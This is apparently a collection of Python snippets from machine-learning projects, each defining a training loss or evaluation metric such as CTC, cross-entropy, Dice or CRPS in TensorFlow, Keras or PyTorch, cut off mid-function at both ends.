self.hparams.ctc_cost(\n p_ctc, transcription_tokens, wav_lens, transcription_lens,\n )\n\n # mt attention loss\n if self.hparams.mt_weight > 0:\n mt_loss = self.hparams.seq_cost(\n mt_p_seq, tokens_eos, length=tokens_eos_lens,\n )\n\n asr_loss = (self.hparams.ctc_weight * asr_ctc_loss) + (\n 1 - self.hparams.ctc_weight\n ) * asr_attention_loss\n loss = (\n (1 - self.hparams.asr_weight - self.hparams.mt_weight)\n * attention_loss\n + self.hparams.asr_weight * asr_loss\n + self.hparams.mt_weight * mt_loss\n )\n\n if stage != sb.Stage.TRAIN:\n current_epoch = self.hparams.epoch_counter.current\n valid_search_interval = self.hparams.valid_search_interval\n\n if stage == sb.Stage.TEST:\n # 4 references bleu score\n predictions = [\n en_detoeknizer.detokenize(\n hparams[\"tokenizer\"].decode_ids(utt_seq).split(\" \")\n )\n for utt_seq in hyps\n ]\n\n four_references = [\n batch.translation_0,\n batch.translation_1,\n batch.translation_2,\n batch.translation_3,\n ]\n\n targets = []\n for reference in four_references:\n detokenized_translation = [\n en_detoeknizer.detokenize(translation.split(\" \"))\n for translation in reference\n ]\n targets.append(detokenized_translation)\n\n self.bleu_metric.append(ids, predictions, targets)\n elif (\n current_epoch % valid_search_interval == 0\n and stage == sb.Stage.VALID\n ):\n predictions = [\n en_detoeknizer.detokenize(\n hparams[\"tokenizer\"].decode_ids(utt_seq).split(\" \")\n )\n for utt_seq in hyps\n ]\n\n targets = [\n en_detoeknizer.detokenize(translation.split(\" \"))\n for translation in batch.translation_0\n ]\n self.bleu_metric.append(ids, predictions, [targets])\n\n # compute the accuracy of the one-step-forward prediction\n self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)\n\n return loss", "def Weighted_Cross_Entropy(y_true, y_pred, eps = 1e-10):\n y_pred = tf.cast(y_pred, 'float64')\n y_true = tf.cast(y_true, 'float64')\n # deduce weights based on true pixel value\n class_weights = weights * y_true\n # compute your (unweighted) softmax cross entropy loss\n unweighted_losses = y_true*tf.math.log(y_pred + eps)\n ##print(unweighted_losses.dtype, weights.dtype)\n weighted_losses = unweighted_losses * class_weights\n # reduce the result to get your final loss\n loss = -tf.reduce_sum(weighted_losses)\n return loss", "def mse_loss1_rgb_col(y_true,y_pred):\n y_pred = tf_rgb2ycbcr(y_pred)/255.\n \n y_c_pred,cb_c_pred,cr_c_pred=tf.split(y_pred, 3 , axis=-1)\n y_c_true,cb_c_true,cr_c_true=tf.split(y_true, 3 , axis=-1) \n \n return ((tf.keras.losses.MSE(tf.expand_dims(cb_c_pred, axis=0),tf.expand_dims(cb_c_true, axis=0))) + (tf.keras.losses.MSE(tf.expand_dims(cr_c_pred, axis=0),tf.expand_dims(cr_c_true, axis=0))))", "def loss(y_true, y_pred):\r\n smooth = 1.\r\n skel_pred = soft_skel(y_pred, iter_)\r\n skel_true = soft_skel(y_true, iter_)\r\n pres = (K.sum(tf.math.multiply(skel_pred, y_true)[:,1:,:,:,:])+smooth)/(K.sum(skel_pred[:,1:,:,:,:])+smooth) \r\n rec = (K.sum(tf.math.multiply(skel_true, y_pred)[:,1:,:,:,:])+smooth)/(K.sum(skel_true[:,1:,:,:,:])+smooth) \r\n cl_dice = 1.- 2.0*(pres*rec)/(pres+rec)\r\n return cl_dice", "def loss_total(self, mask):\n\n def loss(y_true, y_pred):\n\n # Compute predicted image with non-hole pixels set to ground truth\n y_comp = mask * y_true + (1-mask) * y_pred\n\n # Compute the vgg features. \n if self.vgg_device:\n with tf.device(self.vgg_device):\n vgg_out = self.vgg(y_pred)\n vgg_gt = self.vgg(y_true)\n vgg_comp = self.vgg(y_comp)\n else:\n vgg_out = self.vgg(y_pred)\n vgg_gt = self.vgg(y_true)\n vgg_comp = self.vgg(y_comp)\n \n # Compute loss components\n l1 = self.loss_valid(mask, y_true, y_pred)\n l2 = self.loss_hole(mask, y_true, y_pred)\n l3 = self.loss_perceptual(vgg_out, vgg_gt, vgg_comp)\n l4 = self.loss_tv(mask, y_comp)\n l5 = - 0.5 * K.sum(1 + self.z_log_var -self.cl - K.square(self.z_mean)/K.exp(self.cl) - K.exp(self.z_log_var)/K.exp(self.cl))\n # Return loss function\n return l1 + 6*l2 + 0.05*l3 + 0.1*l4 +l5 \n return loss", "def add_loss_op(self, preds):\n ### YOUR CODE HERE (~2-4 lines)\n trans = tf.get_variable('trans',\n shape=[Config.n_classes, Config.n_classes],\n initializer=tf.contrib.layers.xavier_initializer())\n log_likelihood, _ = crf_log_likelihood(preds,\n self.labels_placeholder,\n self.length_placeholder,\n trans)\n #log_likelihood = tf.boolean_mask(log_likelihood, self.mask_placeholder)\n loss = tf.reduce_mean(-1.0 * log_likelihood)\n \n ### END YOUR CODE\n return trans, loss", "def gen_criterion(dis_preds, ctc_loss):\n return ctc_loss - torch.mean(dis_preds)\n # return -torch.mean(dis_preds)", "def calculate_loss(self, outputs, teacher_predictions, labels=None):\n return self.loss(outputs,\n (teacher_predictions[:, :, :self.target_dim],\n teacher_predictions[:, :, self.target_dim:]))", "def crps_cost_function(y_true, y_pred, theano=False):\n\n # Split input\n mu = y_pred[:, 0]\n sigma = y_pred[:, 1]\n # Ugly workaround for different tensor allocation in keras and theano\n if not theano:\n y_true = y_true[:, 0] # Need to also get rid of axis 1 to match!\n\n # To stop sigma from becoming negative we first have to convert it the the variance and then take the square root again. \n var = K.square(sigma)\n # The following three variables are just for convenience\n loc = (y_true - mu) / K.sqrt(var)\n phi = 1.0 / np.sqrt(2.0 * np.pi) * K.exp(-K.square(loc) / 2.0)\n Phi = 0.5 * (1.0 + tf.math.erf(loc / np.sqrt(2.0)))\n # First we will compute the crps for each input/target pair\n crps = K.sqrt(var) * (loc * (2. * Phi - 1.) + 2 * phi - 1. / np.sqrt(np.pi))\n # Then we take the mean. The cost is now a scalar\n \n return K.mean(crps)", "def frcnn_cls_loss(*args):\n y_true, y_pred = args if len(args) == 2 else args[0]\n lf = tf.losses.CategoricalCrossentropy()\n return lf(y_true, y_pred)", "def call(self, y_true, y_pred):\n y_true = K.switch(tf.shape(y_true)[-1] == self.n_classes, y_true, tf.squeeze(tf.one_hot(tf.cast(y_true, tf.int32), self.n_classes)))\n selected_classes = tf.where(y_pred!=0, y_pred*(1/y_pred), y_pred)\n labels = tf.where(selected_classes==0, y_pred, y_true)\n loss = 0.5 * K.square(labels - y_pred)\n return loss * (1/self.batch_size) * (1/self.replicas)", "def cross_entropy_loss(batch_out, batch_gt):\r\n criterion = torch.nn.CrossEntropyLoss()\r\n target = torch.argmax(batch_gt, 1)\r\n loss = criterion(batch_out, target)\r\n\r\n return loss", "def compute_batch_loss(self, batch_data):\n loss = 0\n for data in batch_data:\n x, y = data\n x = x.view(-1,x.shape[0],x.shape[1])\n y = y.view(-1,y.shape[0], y.shape[1])\n loss += self.compute_loss(x.to(self.device), y.to(self.device))\n \n return loss", "def forward(self,pad_pred:torch.Tensor, pad_targets:torch.Tensor, ylen, ctc_out, hlens): # , ylen, encoder_output, hlens\n batch_size,maxlen,_ = pad_pred.size()\n self.loss = self.criterion(pad_pred.view(batch_size*maxlen,-1),pad_targets.view(-1))\n ppl = self.compute_perplexity(self.loss.item())\n self.loss *= (np.mean([ len(x[x!=self.ignore_label]) for x in pad_targets]) - 1)\n\n ## Try to add CTC loss.\n ylen_tensor = torch.LongTensor([length for length in ylen])\n hlens_tensor = torch.LongTensor([length for length in hlens])\n ctc_pad_targets = torch.clone(pad_targets)\n ctc_pad_targets[ctc_pad_targets==-1] = 0\n self.loss = 0.9 * self.loss + 0.1 * \\\n self.ctc(ctc_out.permute(1, 0, 2).log_softmax(-1), \n ctc_pad_targets, hlens_tensor, ylen_tensor)\n\n if self.training:\n return self.loss,self.compute_accuracy(pad_pred,pad_targets),None\n else:\n return self.loss,self.compute_accuracy(pad_pred,pad_targets),self.compute_wer(pad_pred,pad_targets)", "def loss_(self, batch):\n raise NotImplementedError", "def loss_softmax_cross_entropy(self, unet, predict, ground_truth):\n\n loss = -F.mean(F.log(predict+1e-16) * ground_truth)\n\n chainer.report({\"loss\":loss}, unet)#mistery\n return loss", "def loss_fn(y_true,y_pred): \n loss = tf.nn.softmax_cross_entropy_with_logits_v2(y_true,\n y_pred,\n axis=-1,\n )\n loss = tf.reduce_mean(loss,name=\"loss\")\n return loss", "def _compute_loss(self, predictions, targets, **params):\n pass", "def loss_fn(outputs, labels, wts):\n\n # reshape labels to give a flat vector of length batch_size*seq_len\n loss_noreduce = nn.BCEWithLogitsLoss(reduce=False)\n loss = torch.mean(loss_noreduce(outputs, labels)*wts)\n\t\n # compute cross entropy loss for all tokens\n return loss", "def get_loss(self, model, target, output):\n\t\tbackend = model.get_backend()\n\n\t\tif backend.get_name() == 'keras':\n\n\t\t\timport keras.backend as K\n\n\t\t\tif 'warp' in self.variant:\n\n\t\t\t\t# Just use the built-in Keras CTC loss function.\n\t\t\t\tlogger.info('Attaching Warp-CTC loss function to model '\n\t\t\t\t\t'output \"%s\".', target)\n\n\t\t\t\tif backend.get_toolchain() != 'theano':\n\t\t\t\t\tlogger.error('If you want to use warp-ctc, you need to '\n\t\t\t\t\t\t'use the Theano backend to Keras.')\n\t\t\t\t\traise ValueError('Warp-CTC is currently only supported '\n\t\t\t\t\t\t'with the Theano backend to Keras.')\n\n\t\t\telse:\n\t\t\t\t# Just use the built-in Keras CTC loss function.\n\t\t\t\tlogger.debug('Attaching built-in Keras CTC loss function to '\n\t\t\t\t\t'model output \"%s\".', target)\n\n\t\t\tctc_scaled = 'ctc_scaled_{}'.format(self.input_length)\n\t\t\tflattened_labels = 'ctc_flattened_labels_{}'.format(target)\n\n\t\t\ttranscript_length = K.placeholder(\n\t\t\t\tndim=2,\n\t\t\t\tdtype='int32',\n\t\t\t\tname=self.output_length\n\t\t\t)\n\t\t\ttranscript = K.placeholder(\n\t\t\t\tndim=2,\n\t\t\t\tdtype='int32',\n\t\t\t\tname=flattened_labels if 'warp' in self.variant \\\n\t\t\t\t\telse self.output\n\t\t\t)\n\t\t\tutterance_length = K.placeholder(\n\t\t\t\tndim=2,\n\t\t\t\tdtype='int32',\n\t\t\t\tname=self.input_length if self.relative_to is None \\\n\t\t\t\t\telse ctc_scaled\n\t\t\t)\n\n\t\t\tif self.relative_to is not None:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tctc_scaled,\n\t\t\t\t\tScaledSource(\n\t\t\t\t\t\tmodel,\n\t\t\t\t\t\trelative_to=self.relative_to,\n\t\t\t\t\t\tto_this=target,\n\t\t\t\t\t\tscale_this=self.input_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\tif 'warp' in self.variant:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tflattened_labels,\n\t\t\t\t\tFlattenSource(\n\t\t\t\t\t\tself.output,\n\t\t\t\t\t\tself.output_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\t\ttry:\n\t\t\t\t\timport ctc\t\t\t\t\t# pylint: disable=import-error\n\t\t\t\texcept ImportError:\n\t\t\t\t\tlogger.error('The warp-CTC loss function was requested, '\n\t\t\t\t\t\t'but we cannot find the \"ctc\" library. See our '\n\t\t\t\t\t\t'troubleshooting page for helpful tips.')\n\t\t\t\t\traise ImportError('Cannot find the \"ctc\" library, which '\n\t\t\t\t\t\t'is needed when using the \"warp\" variant of the CTC '\n\t\t\t\t\t\t'loss function.')\n\n\t\t\t\tout = ctc.cpu_ctc_th(\n\t\t\t\t\toutput.dimshuffle((1, 0, 2)),\n\t\t\t\t\tK.squeeze(utterance_length, -1),\n\t\t\t\t\ttranscript[0]+1,\n\t\t\t\t\tK.squeeze(transcript_length, -1)\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tout = K.ctc_batch_cost(\n\t\t\t\t\ttranscript,\n\t\t\t\t\toutput,\n\t\t\t\t\tutterance_length,\n\t\t\t\t\ttranscript_length\n\t\t\t\t)\n\n\t\t\tif 'loss_scale' in self.variant:\n\t\t\t\tlogger.debug('Loss scaling is active.')\n\t\t\t\tout = out * K.mean(\n\t\t\t\t\tK.cast(utterance_length, K.dtype(out))\n\t\t\t\t) / 100\n\n\t\t\treturn (\n\t\t\t\t(\n\t\t\t\t\t(self.output_length, transcript_length),\n\t\t\t\t\t(flattened_labels if 'warp' in self.variant \\\n\t\t\t\t\t\telse self.output, transcript),\n\t\t\t\t\t(self.input_length if self.relative_to is None \\\n\t\t\t\t\t\telse ctc_scaled, utterance_length)\n\t\t\t\t),\n\t\t\t\tout\n\t\t\t)\n\n\t\telif backend.get_name() == 'pytorch':\n\n\t\t\tif 'warp' not in self.variant:\n\t\t\t\tlogger.error('PyTorch does not include a native CTC loss '\n\t\t\t\t\t'function yet. However, PyTorch bindings to Warp CTC are '\n\t\t\t\t\t'available (SeanNaren/warp-ctc). Try installing that, and '\n\t\t\t\t\t'then settings variant=warp.')\n\t\t\t\traise ValueError('Only Warp CTC is supported for PyTorch '\n\t\t\t\t\t'right now.')\n\n\t\t\tctc_scaled = 'ctc_scaled_{}'.format(self.input_length)\n\t\t\tflattened_labels = 'ctc_flattened_labels_{}'.format(target)\n\t\t\ttranscript_length = model.data.placeholder(\n\t\t\t\tself.output_length,\n\t\t\t\tlocation='cpu',\n\t\t\t\tdata_type='int'\n\t\t\t)\n\t\t\ttranscript = model.data.placeholder(\n\t\t\t\tflattened_labels,\n\t\t\t\tlocation='cpu',\n\t\t\t\tdata_type='int'\n\t\t\t)\n\t\t\tutterance_length = model.data.placeholder(\n\t\t\t\tself.input_length if self.relative_to is None else ctc_scaled,\n\t\t\t\tlocation='cpu',\n\t\t\t\tdata_type='int'\n\t\t\t)\n\n\t\t\tif self.relative_to is not None:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tctc_scaled,\n\t\t\t\t\tScaledSource(\n\t\t\t\t\t\tmodel,\n\t\t\t\t\t\trelative_to=self.relative_to,\n\t\t\t\t\t\tto_this=target,\n\t\t\t\t\t\tscale_this=self.input_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\tif 'warp' in self.variant:\n\t\t\t\tmodel.add_data_source(\n\t\t\t\t\tflattened_labels,\n\t\t\t\t\tFlattenSource(\n\t\t\t\t\t\tself.output,\n\t\t\t\t\t\tself.output_length\n\t\t\t\t\t)\n\t\t\t\t)\n\n\t\t\ttry:\n\t\t\t\tfrom warpctc_pytorch import CTCLoss\t# pytorch: disable=import-error\n\t\t\texcept ImportError:\n\t\t\t\tlogger.error('The warp-CTC loss function was requested, '\n\t\t\t\t\t'but we cannot find the \"warpctc_pytorch\" library. See '\n\t\t\t\t\t'out troubleshooting page for helpful tips.')\n\t\t\t\traise ImportError('Cannot find the \"warpctc_pytorch\" library, '\n\t\t\t\t\t'which is needed when using the \"warp\" variant of the CTC '\n\t\t\t\t\t'loss function.')\n\n\t\t\tloss = model.data.move(CTCLoss())\n\n\t\t\tdef basic_ctc_loss(inputs, output):\n\t\t\t\t\"\"\" Computes CTC loss.\n\t\t\t\t\"\"\"\n\t\t\t\treturn loss(\n\t\t\t\t\toutput.transpose(1, 0).contiguous(),\n\t\t\t\t\tinputs[0][0]+1,\t\t# transcript[0]+1\n\t\t\t\t\tinputs[1].squeeze(1),\t# K.squeeze(utterance_length, -1),\n\t\t\t\t\tinputs[2].squeeze(1)\t# K.squeeze(transcript_length, -1)\n\t\t\t\t) / output.size(0)\n\n\t\t\tif 'loss_scale' in self.variant:\n\t\t\t\tlogger.debug('Loss scaling is active.')\n\n\t\t\t\tdef loss_scale(inputs, output):\n\t\t\t\t\t\"\"\" Computes CTC loss.\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tfactor = inputs[1].float().mean().data[0] / 100.\n\t\t\t\t\treturn basic_ctc_loss(inputs, output) * factor\n\n\t\t\t\tget_ctc_loss = loss_scale\n\t\t\telse:\n\t\t\t\tget_ctc_loss = basic_ctc_loss\n\n\t\t\treturn [\n\t\t\t\t[\n\t\t\t\t\t(flattened_labels if 'warp' in self.variant \\\n\t\t\t\t\t\telse self.output, transcript),\n\t\t\t\t\t(self.input_length if self.relative_to is None \\\n\t\t\t\t\t\telse ctc_scaled, utterance_length),\n\t\t\t\t\t(self.output_length, transcript_length)\n\t\t\t\t],\n\t\t\t\tget_ctc_loss\n\t\t\t]\n\n\t\telse:\n\t\t\traise ValueError('Unsupported backend \"{}\" for loss function \"{}\"'\n\t\t\t\t.format(backend.get_name(), self.get_name()))", "def mcc(y_true, y_pred):\n \n tp = true_positive(y_true, y_pred)\n tn = true_negative(y_true, y_pred)\n fp = false_positive(y_true, y_pred)\n fn = false_negative(y_true, y_pred)\n numerator = (tp * tn) - (fp * fn)\n denominator = (\n (tp + fp) *\n (fn + tn) *\n (fp + tn) *\n (tp + fn)\n )\n \n denominator = denominator ** 0.5\n return numerator/denominator", "def _calc_loss(self, p_act_output:torch.Tensor, p_pred_output:torch.Tensor) -> float:\r\n\r\n return self._loss_fct(p_act_output, p_pred_output)", "def bce_loss(pred, label, weights=None):\n row_pred, column_pred = pred\n row_label, column_label = label\n\n criterion = torch.nn.BCELoss(torch.tensor([10.])).cuda()\n\n lr3 = criterion(row_pred[0].view(-1), row_label.view(-1))\n\n lc3 = criterion(column_pred[0].view(-1), column_label.view(-1))\n\n loss = lr3 + lc3\n\n return loss", "def clus_acc(ypred, y):\n assert len(y) > 0\n assert len(np.unique(ypred)) == len(np.unique(y))\n \n s = np.unique(ypred)\n t = np.unique(y)\n \n N = len(np.unique(ypred))\n C = np.zeros((N, N), dtype = np.int32)\n for i in range(N):\n for j in range(N):\n idx = np.logical_and(ypred == s[i], y == t[j])\n C[i][j] = np.count_nonzero(idx)\n \n # convert the C matrix to the 'true' cost\n Cmax = np.amax(C)\n C = Cmax - C\n # \n indices = linear_assignment(C)\n row = indices[:][:, 0]\n col = indices[:][:, 1]\n # calculating the accuracy according to the optimal assignment\n count = 0\n for i in range(N):\n idx = np.logical_and(ypred == s[row[i]], y == t[col[i]] )\n count += np.count_nonzero(idx)\n \n return 1.0*count/len(y)", "def compute_loss(self):", "def loss(data, y_pred):\n # TODO: Try using points other than the training data points for the divergence calculation.\n y_true = data[:,:2]\n p1 = data[:,2:5]\n p2 = data[:,5:8]\n p3 = data[:,8:11]\n p4 = data[:,11:14]\n\n ### Calculate divergence using model predictions:\n\n # Step 1: Use the model to calculate predicted wind field in the surrounding points p1, p2, p3 and p4.\n y_pred_p1 = model(p1)\n y_pred_p2 = model(p2)\n y_pred_p3 = model(p3)\n y_pred_p4 = model(p4)\n\n # Step 2: Calculate the partial derivatives with a three-point centered difference.\n scale_x = self.scaler_data.scale_[0] #scale-factor for x\n scale_y = self.scaler_data.scale_[1] #scale-factor for y\n\n dudx = (y_pred_p1[:, 0] - y_pred_p3[:, 0]) / (p1[:,0] - p3[:,0]) # <- pj = transformed data\n dvdy = (y_pred_p2[:, 1] - y_pred_p4[:, 1]) / (p2[:,1] - p4[:,1]) # <- pj = transformed data\n\n # Step 3: Calculate the divergence.\n divergence = ( dudx / scale_x + dvdy / scale_y ) * np.mean([scale_x, scale_y])\n #tf.print(K.mean(K.abs(divergence)))\n\n # Step 4: Calculate and return total loss.\n return K.mean(K.square(y_true - y_pred)) + gamma*K.mean(K.square(divergence))", "def loss_sce(y_pred, y_true):\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y_true, logits=y_pred)\n\n return tf.reduce_mean(loss)", "def loss(self, log_prob, C):\n W = self.W\n T = self.T\n average_log_loss = -C * log_prob\n W_norm = torch.sum(torch.tensor([(torch.norm(Wy.double())) ** 2 for Wy in W])) / 2\n T_norm = torch.sum(torch.tensor([torch.sum(torch.tensor([Tij ** 2 for Tij in row])) for row in T])) / 2\n loss = average_log_loss + W_norm + T_norm\n return loss", "def calc_loss(predictions, labels):\n return np.mean(np.square(predictions - labels))", "def evaluate_loss(\n model,\n ds,\n loss_func_name = 'CE'\n):\n loss = 0\n if loss_func_name == 'CE':\n loss_func = tf.keras.losses.SparseCategoricalCrossentropy(\n reduction=tf.keras.losses.Reduction.SUM\n )\n else:\n raise ValueError(f'Not supported loss function {loss_func_name}!')\n n = 0\n for batch_x, batch_y in ds:\n batch_output = get_model_output(model, batch_x)\n loss += loss_func(batch_y, batch_output)\n n += batch_y.shape[0]\n return loss / n", "def calc_cost(self):\n \n correct_pred = tf.equal(self.predictions, tf.argmax(self.y,1))\n batchaccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) \n return self.cost, batchaccuracy, self.predictions", "def cca_loss(outdim_size, use_all_singular_values):\n def inner_cca_objective(y_true, y_pred):\n \"\"\"\n It is the loss function of CCA as introduced in the original paper. There can be other formulations.\n It is implemented by Theano tensor operations, and does not work on Tensorflow backend\n y_true is just ignored\n \"\"\"\n\n r1 = 1e-4\n r2 = 1e-4\n eps = 1e-12\n o1 = o2 = y_pred.shape[1]//2\n\n # unpack (separate) the output of networks for view 1 and view 2\n H1 = tf.transpose(y_pred[:, 0:o1])\n H2 = tf.transpose(y_pred[:, o1:o1+o2])\n\n m = H1.shape[1]\n\n H1bar = H1 - (tf.math.divide(1, m)) * tf.dot(H1, tf.ones([m, m]))\n H2bar = H2 - (tf.math.divide(1, m)) * tf.dot(H2, tf.ones([m, m]))\n\n SigmaHat12 = (tf.math.divide(1, m-1)) * \\\n tf.dot(H1bar, tf.transpose(H2bar))\n SigmaHat11 = (tf.math.divide(1, m-1)) * tf.dot(H1bar,\n tf.transpose(H1bar)) + r1 * tf.eye(o1)\n SigmaHat22 = (tf.math.divide(1, m-1)) * tf.dot(H2bar,\n tf.transpose(H2bar)) + r2 * tf.eye(o2)\n\n # Calculating the root inverse of covariance matrices by using eigen decomposition\n [D1, V1] = tf.nlinalg.eigh(SigmaHat11)\n [D2, V2] = tf.nlinalg.eigh(SigmaHat22)\n\n # Added to increase stability\n posInd1 = tf.gt(D1, eps).nonzero()[0]\n D1 = D1[posInd1]\n V1 = V1[:, posInd1]\n posInd2 = tf.gt(D2, eps).nonzero()[0]\n D2 = D2[posInd2]\n V2 = V2[:, posInd2]\n\n SigmaHat11RootInv = tf.dot(\n tf.dot(V1, tf.nlinalg.diag(D1 ** -0.5)), tf.transpose(V1))\n SigmaHat22RootInv = tf.dot(\n tf.dot(V2, tf.nlinalg.diag(D2 ** -0.5)), tf.transpose(V2))\n\n Tval = tf.dot(tf.dot(SigmaHat11RootInv, SigmaHat12), SigmaHat22RootInv)\n\n if use_all_singular_values:\n # all singular values are used to calculate the correlation\n corr = tf.sqrt(tf.nlinalg.trace(tf.dot(tf.transpose(Tval), Tval)))\n else:\n # just the top outdim_size singular values are used\n [U, V] = tf.nlinalg.eigh(T.dot(tf.transpose(Tval), Tval))\n U = U[tf.gt(U, eps).nonzero()[0]]\n U = U.sort()\n corr = tf.sum(tf.sqrt(U[0:outdim_size]))\n\n return -corr\n\n return inner_cca_objective", "def rpn_cls_loss(*args):\n y_true, y_pred = args if len(args) == 2 else args[0]\n indices = tf.where(tf.not_equal(y_true, -1))\n target = tf.gather_nd(y_true, indices)\n output = tf.gather_nd(y_pred, indices)\n lf = tf.losses.BinaryCrossentropy()\n return lf(target, output)", "def calculate_loss(model, t, logits, labels):\n model_para = model.get_paramaters_list_reshape()\n myTF.calculate_para_dependence_loss(model_para,t)\n\n myTF.calculate_cross_entropy_loss(logits, labels)\n\n return tf.add_n(tf.get_collection('losses'), name='loss_total')", "def compute_objectives(self, predictions, batch, stage):\n _, lens = batch.sig\n emoid, _ = batch.emo_encoded\n\n # Concatenate labels (due to data augmentation)\n if stage == sb.Stage.TRAIN:\n\n if hasattr(self.hparams.lr_annealing, \"on_batch_end\"):\n self.hparams.lr_annealing.on_batch_end(self.optimizer)\n\n loss = self.hparams.compute_cost(predictions, emoid, lens)\n\n if stage != sb.Stage.TRAIN:\n self.error_metrics.append(batch.id, predictions, emoid, lens)\n\n return loss", "def loss(self, prediction_dict, gt_boxes_list, gt_labels_list):\n with tf.name_scope(None, 'Loss', prediction_dict.values()):\n (batch_cls_targets, batch_cls_weights, batch_reg_targets, batch_reg_weights,\n match_list) = self._assign_targets(gt_boxes_list, gt_labels_list)\n # num_positives = [tf.reduce_sum(tf.cast(tf.not_equal(matches.match_results, -1), tf.float32))\n # for matches in match_list]\n self._summarize_target_assignment(gt_boxes_list, match_list)\n reg_loss = regression_loss(prediction_dict[\"box_pred\"], batch_reg_targets, batch_reg_weights)\n cls_loss = focal_loss(prediction_dict[\"cls_pred\"], batch_cls_targets, batch_cls_weights)\n # normalize loss by num of matches\n # num_pos_anchors = [tf.reduce_sum(tf.cast(tf.not_equal(match.match_results, -1), tf.float32))\n # for match in match_list]\n normalizer = tf.maximum(tf.to_float(tf.reduce_sum(batch_reg_weights)), 1.0)\n # normalize reg loss by box codesize (here is 4)\n reg_normalizer = normalizer * 4\n normalized_reg_loss = tf.multiply(reg_loss, 1.0/reg_normalizer, name=\"regression_loss\")\n normalized_cls_loss = tf.multiply(cls_loss, 1.0/normalizer, name=\"classification_loss\")\n return normalized_reg_loss, normalized_cls_loss, batch_reg_weights, batch_cls_weights", "def _get_cost(self):\n logging.info(\"Cost: {}\".format(self.cost_function.name))\n\n with tf.name_scope(\"cost\"):\n\n if self.cost_function == Cost.BATCH_DICE_LOG or self.cost_function == Cost.BATCH_DICE_SOFT or \\\n self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n # calculate Dice loss over the complete batch (take batch as pseudo 3d Tensor)\n if self._n_class == 1:\n # if nr classes is 1 axis 3 has only one component\n axis = (0, 1, 2, 3)\n else:\n axis = (0, 1, 2)\n else:\n # compute dice for each slice and take average (normally not used but considered as option)\n if self._n_class == 1:\n axis = (1, 2, 3)\n else:\n axis = (1, 2)\n # flatten input and outpout\n flat_logits = tf.reshape(self.logits, [-1, self._n_class])\n flat_labels = tf.reshape(self.y, [-1, self._n_class])\n\n # cross entropy loss\n if self.cost_function == Cost.CROSS_ENTROPY:\n # if class weights are None cross entropy will not be weighted\n loss = tfu.get_cross_entropy(logits=flat_logits, y=flat_labels, n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice loss\n elif self.cost_function == Cost.DICE_SOFT or self.cost_function == Cost.BATCH_DICE_SOFT:\n loss = 1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice, exclude_zero_label=False)\n # Weighted combination of dice and cross entropy\n elif self.cost_function == Cost.DICE_SOFT_CE or self.cost_function == Cost.BATCH_DICE_SOFT_CE:\n loss = self._loss_weight * (1.0 - tfu.get_dice_loss(logits=self.logits, y=self.y, axis=axis,\n weights=self._class_weights_dice,\n exclude_zero_label=False))\n loss += (1.0 - self._loss_weight) * tfu.get_cross_entropy(logits=flat_logits, y=flat_labels,\n n_class=self._n_class,\n weights=self._class_weights_ce)\n # Dice log loss (-log(dice_score)). Considered to have nicer gradient.\n # But seems to be not realy more valuable in real life\n elif self.cost_function == Cost.DICE_LOG or self.cost_function == Cost.BATCH_DICE_LOG:\n loss = tfu.get_dice_log_loss(self.logits, self.y, axis=axis, exclude_zero_label=False)\n\n # MSE loss used for regression tasks\n elif self.cost_function == Cost.MSE:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n\n # TV loss (MSE + total variation of output as regularizer). Seems to not work very\n elif self.cost_function == Cost.TV:\n loss = tf.losses.mean_squared_error(flat_logits, flat_labels)\n tv = tf.reduce_sum(tf.image.total_variation(self.logits))\n loss += self._tv_regularizer * tv\n else:\n raise ValueError(\"Unknown cost function: \" % self.cost_function.name)\n\n # if value for l1 or l2 regularizer is given add them to the loss\n if self._l2_regularizer is not None:\n self.l2regularizers = self._l2_regularizer * sum(\n [tf.nn.l2_loss(variable) for variable in self.variables])\n loss += self.l2regularizers\n if self._l1_regularizer is not None:\n self.l1regularizers = self._l1_regularizer * sum([\n tf.reduce_sum(tf.abs(variable)) for variable in self.variables])\n loss += self.l1regularizers\n\n return loss", "def cnn_pred(self):\n \n # Construct model\n pred = self.conv_net()\n \n # Evaluate model\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(self.y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n \n return (pred, correct_pred, accuracy)", "def _classification_loss(self, logits, labels, num_classes):\n labels = tf.to_int64(labels)\n onehot_labels = tf.one_hot(labels, num_classes)\n with tf.name_scope('finetuning_loss'):\n cross_entropy = tf.losses.softmax_cross_entropy(\n onehot_labels=onehot_labels, logits=logits)\n cross_entropy = tf.reduce_mean(cross_entropy)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy + self.weight_decay * regularization\n return loss", "def add_loss_op(self, pred):\n ### YOUR CODE HERE\n loss = cross_entropy_loss(self.labels_placeholder,pred)\n ### END YOUR CODE\n return loss", "def CE():\n def CE_loss(input,target):\n return nn.CrossEntropyLoss()(input.squeeze(), target)\n\n return CE_loss", "def loss(self, prediction_dict, preprocessed_dict, epsilon=1e-12):\r\n gt_images = preprocessed_dict.get('images')\r\n gt_fg = preprocessed_dict.get('images_fg')\r\n gt_bg = preprocessed_dict.get('images_bg')\r\n gt_alpha_matte = preprocessed_dict.get('alpha_mattes')\r\n gt_trimaps = preprocessed_dict.get('trimaps')\r\n\r\n pred_trimaps = prediction_dict.get('pred_trimap')\r\n alpha_matte_r = prediction_dict.get('alpha_matte_r')\r\n alpha_matte_p = prediction_dict.get('alpha_matte_p')\r\n background = prediction_dict.get('background')\r\n foreground = prediction_dict.get('foreground')\r\n\r\n pred_images = tf.multiply(alpha_matte_p, gt_fg) + tf.multiply(1 - alpha_matte_p, gt_bg)\r\n\r\n # weights = tf.where(tf.equal(pred_trimaps, 128),\r\n # tf.ones_like(pred_trimaps),\r\n # 